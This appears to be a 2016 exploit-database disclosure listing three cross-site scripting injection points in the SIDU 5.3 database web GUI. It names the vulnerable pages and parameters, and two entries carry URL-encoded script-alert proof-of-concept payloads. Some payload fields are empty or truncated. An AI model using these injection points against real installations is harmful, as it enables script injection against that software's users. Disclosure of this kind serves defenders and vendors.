########################################################################################
# Exploit Title: SIDU 5.3 Database Web GUI Multiple XSS Vulnerabilities
# Date: 04.04.2016
# Exploit Author: Ozer Goker
# Vendor Homepage: http://topnew.net/sidu/
# Software Link: https://sourceforge.net/projects/sidu/files/sidu/sidu53.zip
# Version: [app version] 5.3
########################################################################################
XSS details:
########################################################################################
XSS1
URL
http://localhost/sidu53/conn.php
METHOD
Post
PARAMETER
conn[dbs]
PAYLOAD
########################################################################################
XSS2
URL
http://localhost/sidu53/user.php?id=1,,,,,%27%3E%3Cscript%3Ealert%282%29%3C/script%3E
METHOD
Get
PARAMETER
id
PAYLOAD
'>
########################################################################################
XSS3
URL
http://localhost/sidu53/bChart.php?ses=%3Cscript%3Ealert%283%29%3C/script%3E
METHOD
Get
PARAMETER
ses
PAYLOAD
########################################################################################